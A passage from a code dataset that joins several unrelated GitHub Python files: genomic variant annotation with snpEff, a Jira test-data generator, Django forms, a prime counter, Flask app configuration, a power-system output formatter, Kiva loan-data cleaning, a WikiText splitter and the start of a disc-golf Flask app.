-Xmx8g -v {self.database} {os.path.abspath(self.vcf_file)} > variants_ann.vcf \"\n )\n self.run_snpEff.logger.info(cmd)\n\n cwd = os.getcwd()\n os.chdir(self.snpeff_outdir)\n subprocess.check_call(cmd, shell=True)\n # change dir back to avoid can not find '09.analysis_snp/stat.txt' error\n os.chdir(cwd)\n\n @utils.add_log\n def keep_in_gene(self):\n \"\"\"\n Output:\n self.final_vcf_file\n \"\"\"\n gene_list, _, _ = parse_variant_ann(self.snpeff_ann_vcf_file)\n with pysam.VariantFile(self.snpeff_ann_vcf_file) as vcf_in:\n with pysam.VariantFile(self.final_vcf_file, 'w', header=vcf_in.header) as vcf_out:\n for i, record in enumerate(vcf_in.fetch()):\n if gene_list[i] in self.gene_list:\n vcf_out.write(record) \n\n\n def get_variant_table(self):\n \"\"\"\n Returns:\n is_in_gene_list: if res[i] == True, line i is in gene_list\n \"\"\"\n\n df_vcf = parse_vcf_to_df(self.final_vcf_file, infos=[])\n df_vcf[\"Gene\"], df_vcf[\"mRNA\"], df_vcf[\"Protein\"] = parse_variant_ann(self.final_vcf_file)\n df_ncell = pd.read_csv(self.ncell_file)\n df_vcf = pd.concat([df_vcf, df_ncell], axis=1)\n\n cols = [\"Chrom\", \"Pos\", \"Alleles\", \"Gene\", \"0/0\", \"0/1\", \"1/1\", \"mRNA\", \"Protein\"]\n cols = [col for col in cols if col in df_vcf.columns]\n df_vcf = df_vcf.loc[:, cols]\n is_in_gene_list = df_vcf.Gene.isin(self.gene_list)\n df_vcf = df_vcf[is_in_gene_list]\n\n self.variant_table = df_vcf\n self.variant_table.reset_index(drop=True, inplace=True)\n self.variant_table.to_csv(self.variant_table_file, index=False)\n\n def add_help(self):\n '''\n

    Chrom : chromosome name.

    Pos : the 1-based position of the variation on the given sequence.

    Alleles : REF (the reference base, or bases in the case of an indel) - ALT (the alternative alleles).

    0/0, 0/1, 1/1 : number of cells with each genotype.

    Gene : gene symbol.

    mRNA : the coding (c.) sequence change, prefixed with its exon number, in standard HGVS-style nomenclature.

    Protein : the protein (p.) change in standard HGVS-style nomenclature, with three-letter amino-acid codes shortened to one letter.
    \n '''\n self.add_help_content(\n name='Chrom',\n content='Chromosome name'\n )\n self.add_help_content(\n name='Pos',\n content='the 1-based position of the variation on the given sequence'\n )\n self.add_help_content(\n name='Alleles',\n content='REF(reference base or bases in the case of an indel) - ALT(alternative alleles)'\n )\n self.add_help_content(\n name='0/0, 0/1, 1/1',\n content='number of cells with each genotype'\n )\n self.add_help_content(\n name='Gene',\n content='gene symbol'\n )\n self.add_help_content(\n name='mRNA',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n self.add_help_content(\n name='Protein',\n content='A standard nomenclature is used in specifying the sequence changes'\n )\n\n @utils.add_log\n def plot_snp(self):\n match_dict = utils.parse_match_dir(self.args.match_dir)\n if 'h5ad' not in match_dict:\n return\n\n utils.check_mkdir(self.plot_snp_dir)\n df_gt = pd.read_csv(self.gt_file, keep_default_na=False, index_col=0)\n df_v = self.variant_table.copy()\n df_v['n_variants'] = df_v['0/1'] + df_v['1/1']\n indices = df_v.nlargest(self.args.plot_top_n, 'n_variants').index\n df_top = df_gt.iloc[indices,]\n df_top = df_top.transpose()\n variants = df_top.columns\n for c in variants:\n df_top[c] = df_top[c].astype('category')\n\n adata = sc.read_h5ad(match_dict['h5ad'])\n adata.obs = pd.concat([adata.obs, df_top], axis=1)\n pt_size = min(100, 120000 / len(adata.obs))\n gene_list, protein_list = df_v['Gene'], df_v['Protein']\n for i, v in enumerate(variants):\n title = f'top{i+1}_{variants[i]}_{gene_list[indices[i]]}_{protein_list[indices[i]]}'\n file_name = f'{self.plot_snp_dir}/{title}.pdf'\n sc.pl.umap(adata, color=v, size=pt_size, \n palette={'0/0':'dimgray', '0/1':'orange', '1/1':'red','NA':'lightgray'},\n title=title)\n plt.savefig(file_name,dpi=300,bbox_inches=\"tight\")\n\n\n\n def run(self):\n self.run_snpEff()\n self.keep_in_gene()\n self.write_gt()\n self.write_ncell()\n self.get_variant_table()\n self.add_help()\n self.plot_snp()\n table_dict = self.get_table_dict(title='Variant table', table_id='variant', df_table=self.variant_table)\n self.add_data(table_dict=table_dict)\n\n\n@utils.add_log\ndef analysis_snp(args):\n with Analysis_snp(args, display_title='Analysis') as runner:\n runner.run()\n\n\ndef get_opts_analysis_snp(parser, sub_program):\n parser.add_argument(\"--gene_list\", help=HELP_DICT['gene_list'])\n parser.add_argument(\"--database\", help='snpEff database. 
Common choices are GRCh38.mane.1.0.ensembl(human) and GRCm38.99(mouse)', default='GRCh38.mane.1.0.ensembl')\n parser.add_argument(\"--panel\", help=HELP_DICT['panel'], choices=list(PANEL))\n parser.add_argument(\"--plot_top_n\", type=int, help='plot UMAP of at most n variants ', default=20)\n if sub_program:\n s_common(parser)\n parser.add_argument('--match_dir', help=HELP_DICT['match_dir'], required=True)\n parser.add_argument('--vcf', help='vcf file.', required=True)\n","repo_name":"singleron-RD/CeleScope","sub_path":"celescope/snp/analysis_snp.py","file_name":"analysis_snp.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"18"} +{"seq_id":"25651205431","text":"import json\nimport pathlib\nfrom base64 import b64encode\nfrom typing import Any, List, Mapping\n\nfrom airbyte_cdk.sources.streams.http.auth import TokenAuthenticator\nfrom streams import (\n DashboardsGenerator,\n FiltersGenerator,\n FilterSharingGenerator,\n GroupsGenerator,\n IssueCommentsGenerator,\n IssueFieldsGenerator,\n IssueRemoteLinksGenerator,\n IssuesGenerator,\n IssueVotesGenerator,\n IssueWatchersGenerator,\n ProjectCategoriesGenerator,\n ProjectComponentsGenerator,\n ProjectsGenerator,\n ProjectVersionsGenerator,\n ScreensGenerator,\n UsersGenerator,\n WorkflowSchemesGenerator,\n WorkflowsGenerator,\n)\n\n\nclass Generator:\n base_config_path = \"secrets/config.json\"\n\n def __init__(self):\n self.configs = None\n super(Generator, self).__init__()\n\n def _get_configs(self):\n if not self.configs:\n source_directory = pathlib.Path(__file__).resolve().parent.parent.parent.parent\n configs_path = source_directory.joinpath(self.base_config_path)\n with open(configs_path) as json_configs:\n self.configs = json.load(json_configs)\n return self.configs\n\n @staticmethod\n def _get_authenticator(config: Mapping[str, Any]):\n token = b64encode(bytes(config[\"email\"] + \":\" + config[\"api_token\"], \"utf-8\")).decode(\"ascii\")\n authenticator = TokenAuthenticator(token, auth_method=\"Basic\")\n return authenticator\n\n def streams(self) -> List:\n config = self._get_configs()\n authenticator = self._get_authenticator(config)\n args = {\"authenticator\": authenticator, \"domain\": config[\"domain\"]}\n return [\n DashboardsGenerator(**args),\n FiltersGenerator(**args),\n FilterSharingGenerator(**args),\n GroupsGenerator(**args),\n IssuesGenerator(**args),\n IssueCommentsGenerator(**args),\n IssueFieldsGenerator(**args),\n IssueRemoteLinksGenerator(**args),\n IssueVotesGenerator(**args),\n IssueWatchersGenerator(**args),\n ProjectsGenerator(**args),\n ProjectCategoriesGenerator(**args),\n ProjectComponentsGenerator(**args),\n ProjectVersionsGenerator(**args),\n ScreensGenerator(**args),\n UsersGenerator(**args),\n WorkflowsGenerator(**args),\n WorkflowSchemesGenerator(**args),\n ]\n\n def run(self):\n for stream in self.streams():\n stream.generate()\n\n\nif __name__ == \"__main__\":\n generator = Generator()\n generator.run()\n","repo_name":"datasphere-oss/datasphere-databyte","sub_path":"airbyte-integrations/connectors/source-jira/integration_tests/fixtures/data_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11134001730","text":"from django.contrib.auth.forms import AuthenticationForm, UserChangeForm\nfrom .models import EPS, CustomUser, TipoUsuario, InfoMiembros, 
TipoDocumento, EstadoCivil, RegimenSeguridad, Sexo, Etnia\nfrom django import forms\nfrom django.utils.html import format_html\n\n\nclass FiltroUsuarios(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n id_usuario = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n documento_usuario = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\nclass FiltroPacientes(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\n \n \n\nclass FiltroLlamadasForm(forms.Form):\n id_llamada = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n \n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n \n fecha_llamada = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n \n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass FiltroCitasForm(forms.Form):\n id_cita = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n fecha_cita = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass CustomUserRegistrationForm(forms.ModelForm):\n username = forms.CharField(\n label='Nombre de usuario',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Nombre de usuario'})\n )\n email = forms.EmailField(\n label='Correo electrónico',\n widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Correo electrónico'})\n )\n password = forms.CharField(\n label='Contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Contraseña'})\n )\n password2 = forms.CharField(\n label='Confirmar contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirmar contraseña'})\n )\n tipo_usuario = forms.ModelChoiceField(\n label='Seleccione tipo de usuario',\n queryset=TipoUsuario.objects.all(),\n widget=forms.Select(attrs={'class': 'custom-class form-select', 'id': 'custom-id'}),\n empty_label='Selecciona un tipo de usuario'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['password2'].label = 'Confirmar contraseña'\n\n class Meta:\n model = CustomUser\n fields = ('username', 'email', 'password', 'password2', 'tipo_usuario')\n\n\n\nclass AutodataForm(forms.ModelForm):\n tipo_documento = forms.ModelChoiceField(\n queryset=TipoDocumento.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 
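            # an explicit id is kept alongside the Bootstrap class, presumably so template JS can target each select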
'id': 'id_tipo_documento'\n }),\n empty_label=\"Selecciona tu tipo de documento\"\n )\n estado_civil = forms.ModelChoiceField(\n queryset=EstadoCivil.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_estado_civil'\n }),\n empty_label=\"Selecciona tu estado civil\"\n )\n regimen_seguridad = forms.ModelChoiceField(\n queryset=RegimenSeguridad.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_regimen_seguridad'\n }),\n empty_label=\"Selecciona tu régimen de seguridad\"\n )\n sexo = forms.ModelChoiceField(\n queryset=Sexo.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_sexo'\n }),\n empty_label=\"Selecciona tu sexo\"\n )\n etnia = forms.ModelChoiceField(\n queryset=Etnia.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_etnia'\n }),\n empty_label=\"Selecciona tu Etnia\"\n )\n eps = forms.ModelChoiceField(\n queryset=EPS.objects.all(),\n widget=forms.Select(attrs={'class': 'form-select', 'id': 'id_nombre_eps'})\n )\n\n # Agregar campos restantes con estilos Bootstrap\n nombre = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_nombre'}))\n documento = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_documento'}))\n numero_hijos = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'id': 'id_numero_hijos'}))\n direccion = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_direccion'}))\n barrio = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_barrio'}))\n celular = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_celular'}))\n sisben = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'form-check-input', 'id':'sisben'}),\n required=False)\n class Meta:\n model = InfoMiembros\n fields = ('nombre', 'tipo_documento', 'documento', 'estado_civil', 'numero_hijos', 'etnia',\n 'direccion', 'barrio', 'celular', 'sisben', 'eps', 'regimen_seguridad', 'sexo',)\n\n\nclass CustomUserLoginForm(AuthenticationForm):\n username = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n password = forms.CharField(\n widget=forms.PasswordInput(attrs={'class': 'form-control'}))\n\n","repo_name":"DavidMojicaDev/T3","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9707497421","text":"# !usr/bin/env python3\r\n\r\n\"\"\"Counts the number of primes from 2 to a user-specified limit.\r\nA number is considered prime if it is greater than or equal to 2,\r\nand its only factors are 1 and itself.\r\n\"\"\"\r\n\r\nimport cProfile\r\nimport pstats\r\nfrom math import isqrt\r\n\r\n\r\ndef count_primes(limit: int) -> int:\r\n \"\"\"Returns the number of primes from 2 to the limit specified.\"\"\"\r\n primes = set(range(3, limit + 1, 2))\r\n for i in range(3, isqrt(limit) + 1, 2):\r\n if i in primes:\r\n primes.difference_update(range(i ** 2, limit + 1, i))\r\n return len(primes) + 1\r\n\r\n\r\ndef main(n: int = 100_000) -> None:\r\n with cProfile.Profile() as pr:\r\n print(count_primes(n))\r\n pr.print_stats(pstats.SortKey.TIME)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
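    # Sanity checks (known values): count_primes(10) == 4, count_primes(100) == 25.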
main(250_000)\r\n","repo_name":"siddsp02/Prime-Counter","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31239419502","text":"#!/usr/bin/python\nimport os\nimport uuid\n\nDEBUG = True\nGOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID', 'not found')\nAUTH_URI = os.environ.get('AUTH_URI', 'not found')\nTOKEN_URI = os.environ.get('TOKEN_URI', 'not found')\nGOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET', 'not found')\nREDIRECT_URIS = os.environ.get('REDIRECT_URIS', 'not found')\nJAVASCRIPT_ORIGINS = os.environ.get('JAVASCRIPT_ORIGINS', 'not found')\nAPPLICATION_NAME = os.environ.get('APP_NAME', 'refit')\nUSERNAME = os.environ.get('USERNAME', 'admin')\nPASSWORD = os.environ.get('PASSWORD', 'admin')\nSECRET_KEY = os.environ.get('SECRET_KEY', str(uuid.uuid4()))\nHOST = os.environ.get('HOST', '0.0.0.0')\nPORT = int(os.environ.get('PORT', 5000))\nGOOGLE_FIT_SCOPES = ['https://www.googleapis.com/auth/fitness.body.read',\n 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/drive.metadata.readonly']\nDATA_SOURCE_ID_CAL1 = 'derived:com.google.calories.bmr:com.google.android.gms:from_height&weight'\nDATA_SOURCE_ID_CAL2 = 'derived:com.google.calories.bmr:com.google.android.gms:merged'\nDATA_SOURCE_ID_STEPS = 'derived:com.google.step_count.delta:com.google.android.gms:estimated_steps'\nDATA_SOURCE_ID_WEIGHT_USER_INPUT = 'raw:com.google.height:com.google.android.apps.fitness:user_input'\nDATA_SOURCE_ID_HR = 'derived:com.google.heart_rate.bpm:com.google.android.gms:merge_heart_rate_bpm'\nDATA_SOURCE_ID_SLEEP = 'raw:com.google.activity.segment:com.mc.miband1:'\nDATA_SOURCE_ID_WEIGHT_MERGE = 'derived:com.google.weight:com.google.android.gms:merge_weight'\n","repo_name":"cnheider/refit","sub_path":"refit/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30955038084","text":"\"\"\"\nOutput TXT file formatter.\n\"\"\"\n\nimport os\nfrom typing import Iterable\n\nfrom andes.shared import np\n\n\ndef dump_data(text, header, rowname, data, file, width=18, precision=5):\n out = ''\n\n os.makedirs(os.path.abspath(os.path.dirname(file)), exist_ok=True)\n with open(file, 'w') as fid:\n\n for Text, Header, Rowname, Data in zip(text, header, rowname, data):\n # Write Text\n if Text:\n fid.writelines(Text)\n\n # determine the width for the first column (usually names)\n width_first = width\n if isinstance(Rowname, Iterable) and len(Rowname) > 0:\n for item in Rowname:\n if isinstance(item, Iterable) and len(item) > width_first:\n width_first = len(item)\n\n # Write Header\n if Header:\n ncol = len(Header)\n s = ' ' * width_first\n s += '{:>{width}s}' * ncol + '\\n'\n fid.writelines(s.format(*Header, width=width))\n fid.write('\\n')\n\n # Append Rowname to Data\n # Data is a list of column lists\n if Rowname is not None:\n ncol = 0\n for idx, item in enumerate(Rowname): # write by row as always\n if Data is None:\n out = ''\n elif isinstance(Data, (int, float, str)):\n out = [Data]\n elif isinstance(Data, (list, tuple, np.ndarray)):\n if isinstance(Data[0], (int, float)): # is a list of numbers\n out = [Data[idx]]\n elif isinstance(Data[0], (list, np.ndarray)): # list of list in Data\n ncol = len(Data)\n 
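                            # list-of-column-lists case: gather the idx-th entry from each of the ncol columns to form output row idx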
out = [Data[i][idx] for i in range(ncol)]\n else:\n print(Data)\n print('Unexpected Data during output, in formats/txt.py')\n\n s = '{:{width_first}s}' # for row header\n for ii, col in enumerate(out):\n if isinstance(col, (int, float)):\n s += '{:>{width}.{precision}g}'\n elif isinstance(col, str):\n if len(col) > width:\n out[ii] = col[:width]\n s += '{:>{width}s}'\n elif col is None:\n out[ii] = 'None'\n s += '{:>{width}s}'\n else:\n pass\n s += '\\n'\n\n fid.write(\n s.format(\n str(item), *out, width_first=width_first, width=width, precision=precision))\n fid.write('\\n')\n","repo_name":"CURENT/andes","sub_path":"andes/io/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"18"} +{"seq_id":"2543922516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 24 12:08:16 2018\r\n\r\n@author: Sandman\r\n\"\"\"\r\n\r\n# kiva_loans.csv file contains comma (,) in the column field value due to this Pyspark CSV reader package is unable to read data correctly\r\n\r\n# Thus, first load the data using the python pandas library and select the appropriate columns, handle the missing values and create new Spark data from Pandas dataframe\r\n\r\n# Operations are as below\r\n# Input File\r\n#kiva_loans.csv -- (id,funded_amount,loan_amount,activity,sector,use,country_code,country,region,currency,partner_id,posted_time,disbursed_time,funded_time,term_in_months,lender_count,tags,borrower_genders,repayment_interval,date)\r\n\r\n# output File in gunzip format\r\n# /user/sahilbhange/output/kiva/formated_output/part-00000.gz\r\n#(id,funded_amount,loan_amount,activity,sector,country,region,currency,partner_id,posted_time,disbursed_time,term_in_months,lender_count,borrower_genders,repayment_interval,date)\r\n\r\n# Spark parameter setting for execution\r\n\r\n# spark-submit --master yarn --conf spark.ui.port=12789 --num-executors 6 --executor-cores 3 --executor-memory 1G src/main/python/kiva_code/kiva_loans_data_preprocessing.py\r\n\r\n\r\nimport pandas as pd\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext\r\n#from pyspark.sql import *\r\n#from pyspark.sql.functions import *\r\n\r\nconf=SparkConf().setAppName(\"kiva-loan-file-cleaning\").setMaster(\"yarn-client\")\r\n\r\nsc = SparkContext(conf=conf)\r\n\r\nsqlContext = SQLContext(sc)\r\n\r\n# load csv file data using pandas\r\nkiva_loan_pdf=pd.read_csv(\"/home/sahilbhange/kiva_loan_data/kiva_loans.csv\", encoding='utf-8',delimiter=',')\r\n\r\n''' \r\n#pandas data pre-processing\r\n#Null values in borrower_genders column\r\n#>>> kiva_loan_pdf['borrower_genders'].isnull().sum()\r\n#4221\r\n\r\n#There are 4221 records with NULL value for field 'borrower_genders'\r\n#Thus default NULL value as \"NotAvailable\"\r\n'''\r\n\r\nkiva_loan_pdf['borrower_genders']=kiva_loan_pdf['borrower_genders'].fillna(\"NotAvailable\")\r\n'''\r\n# normalize the values in borrower_genders columns as below\r\n# male - male\r\n# female - female\r\n# if male and female - group \r\n'''\r\nkiva_loan_pdf['borrower_genders']=[elem if elem in ['female','male'] else 'group' for elem in kiva_loan_pdf['borrower_genders'] ]\r\n\r\n'''\r\n# There are 2396 records with NULL value for field 'disbursed_time'\r\n# thus default missing disbursed_time with '1900-01-01 00:00:00+00:00'\r\n# We can filter out default value records while querying the data\r\n#>>> kiva_loan_pdf['disbursed_time'].isnull().sum()\r\n#2396\r\n# Default the missing values for 
disbursed_time with '1900-01-01 00:00:00+00:00'\r\n'''\r\n\r\nkiva_loan_pdf['disbursed_time']=kiva_loan_pdf['disbursed_time'].fillna(\"1900-01-01 00:00:00+00:00\")\r\n\r\n'''\r\n#>>> kiva_loan_pdf['country_code'].isnull().sum()\r\n#8\r\n\r\n# 8 values for country_code field are NULL\r\n\r\n# Find the corresponding coutry for NULL country_code value\r\n#>>> kiva_loan_pdf[kiva_loan_pdf['country_code'].isnull()][['country','country_code']]\r\n# country country_code\r\n#202537 Namibia NaN\r\n\r\n# Country Namibia has null values for country field\r\n# Fill Namibia coutry code value as 'NA'\r\n'''\r\n\r\nkiva_loan_pdf['country_code']=kiva_loan_pdf['country_code'].fillna(\"NA\")\r\n\r\n# Select only required fields and create new pandas data frame\r\n# Exclude the country code in new file as coutry and coutry code give same information\r\nkivaLoan_req_fields = kiva_loan_pdf[['id','funded_amount','loan_amount','activity','sector','country','currency','partner_id','posted_time','disbursed_time','term_in_months','lender_count','borrower_genders','repayment_interval','date']]\r\n\r\nsqlc=SQLContext(sc)\r\n\r\n# Convert Pandas dataframe to Spark data frame\r\nkivaLoan_SDF=sqlc.createDataFrame(kivaLoan_req_fields)\r\n\r\n\r\n# Save the Spark data frame with the required fields to HDFS in gunzip format\r\n# Save in overwrite mode in case of rerun\r\nkivaLoan_SDF.repartition(1).write.format('com.databricks.spark.csv').option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").save('/user/sahilbhange/output/kiva/formated_output/',header = 'true',mode='overwrite')\r\n\r\n\r\n","repo_name":"sahilbhange/Kiva-Loan-Data-Warehouse","sub_path":"kiva_datapreprocessing/kiva_loans_data_preprocessing.py","file_name":"kiva_loans_data_preprocessing.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3210122533","text":"import argparse\nimport os\nimport re\n\n\ndef parameters():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_filename\", type=str, help=\"file to be sampled\") # 切分的文件路径\n parser.add_argument(\"--output_dir\", type=str) # 切分后的文件保存路径\n args = parser.parse_args()\n\n return args\n\n\n# filename = './wikitext-103-raw/wiki.test.raw'\n# output_dir = './wikitext-103-raw/shuffle'\n\n# 将文件按一级标题划分\ndef read_line(args):\n filename = args.input_filename\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n \n file = open(filename, \"r\", encoding=\"utf-8\") \n paragraph = []\n f_id, title_flag = 1, -1\n \n for line in file:\n tokens = line.strip().split(' ') \n if tokens[0] == \"=\" and tokens[-1] == \"=\" and tokens[1] != \"=\": # 判断是否是一级标题\n title_flag += 1\n \n if title_flag != 1:\n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') # 以写模式\"w\" open会造成覆盖,应该以追加模式\"a\"\n paragraph.writelines(line)\n paragraph.close()\n\n # 遇到新的一级标题,存储在新的文件\n elif title_flag == 1:\n # print(\"Paragraph file saved: \", f_id)\n f_id += 1\n title_flag = 0 \n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') \n paragraph.writelines(line)\n paragraph.close() \n print(\"--------------------\")\n print(\"Input: \", filename)\n print(\"Output: \", output_dir)\n print(\"Total processed: \", f_id, \"files.\")\n print(\"--------------------\")\n file.close()\n\nargs = parameters()\n\ndef main():\n read_line(args)\n\nif __name__ == \"__main__\":\n 
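    # Splits args.input_filename into per-section .raw files under args.output_dir, one file per top-level '= Title =' heading.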
main()\n","repo_name":"YeLusin/FedBERT","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"35348975621","text":"import os\nfrom datetime import datetime\nfrom flask import Flask, request, render_template, redirect, flash, session, g, jsonify\nfrom models import db, connect_db, GroupRound, User, UserRound, Follows\nimport requests\nfrom sqlalchemy.exc import IntegrityError, InvalidRequestError\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom forms import LoginForm, RegisterForm, EditUser, NewRound\nfrom psycopg2.errors import UniqueViolation\nfrom secret.secret import API_KEY, NAME_SEARCH_SIG, ZIP_SEARCH_SIG, LOC_SEARCH_SIG, ID_SEARCH_SIG, PHOTO_SEARCH_SIG, HOLE_INFO_SIG\n\napp = Flask(__name__)\n\nACTIVE_USER = \"active_user_id\"\n\n\nAPI_URL = \"https://www.dgcoursereview.com/api_test/\"\n\n# app.config['API_KEY'] = os.environ.get('API_KEY')\n# app.config['NAME_SEARCH_SIG'] = os.environ.get(\n# 'NAME_SEARCH_SIG')\n# app.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG')\n# app.config['LOC_SEARCH_SIG '] = os.environ.get(\n# 'LOC_SEARCH_SIG')\n# app.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG')\n# app.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n# 'PHOTO_SEARCH_SIG')\n# app.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG')\n\n\n#########################Local Stuff ##################################\n\napp.config['API_KEY'] = os.environ.get('API_KEY', API_KEY)\napp.config['NAME_SEARCH_SIG'] = os.environ.get(\n 'NAME_SEARCH_SIG', NAME_SEARCH_SIG)\napp.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG', ZIP_SEARCH_SIG)\napp.config['LOC_SEARCH_SIG '] = os.environ.get(\n 'LOC_SEARCH_SIG', LOC_SEARCH_SIG)\napp.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG', ID_SEARCH_SIG)\napp.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n 'PHOTO_SEARCH_SIG', PHOTO_SEARCH_SIG)\napp.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG', HOLE_INFO_SIG)\n\n\n#####################################\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgresql:///discgolf')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = False\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', 'veryverysecret')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\napp.debug = False\n\ndebug = DebugToolbarExtension(app)\n\n\nconnect_db(app)\n\n\n@app.before_request\ndef add_user_to_g():\n \"\"\"If we're logged in, add curr user to Flask global.\"\"\"\n\n if ACTIVE_USER in session:\n g.user = User.query.get(session[ACTIVE_USER])\n\n else:\n g.user = None\n\n\ndef user_login(user):\n \"\"\"Log in user\"\"\"\n session[ACTIVE_USER] = user.id\n\n\ndef user_logout():\n \"\"\"Log out user\"\"\"\n if ACTIVE_USER in session:\n del session[ACTIVE_USER]\n\n\ndef get_course_by_id(course_id):\n \"\"\"A call to the API to gather course information based on the course id\n returns a single JSON course response\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'crseinfo', 'id': course_id, 'sig': app.config['ID_SEARCH_SIG']})\n if not res:\n return []\n\n return res.json()\n\n\ndef get_course_by_name(name):\n \"\"\"search the API for courses by name. 
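    Each element is assumed (for illustration only) to look like {'course_id': ..., 'name': ...}.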
